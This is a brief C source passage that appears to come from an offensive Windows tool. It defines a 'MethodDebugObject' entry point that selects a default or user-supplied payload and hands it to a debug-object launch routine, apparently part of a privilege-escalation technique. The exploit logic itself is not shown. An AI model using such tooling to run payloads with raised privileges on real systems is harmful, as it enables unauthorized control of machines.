#endif } UCM_API(MethodDebugObject) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmDebugObjectMethod(lpszPayload); }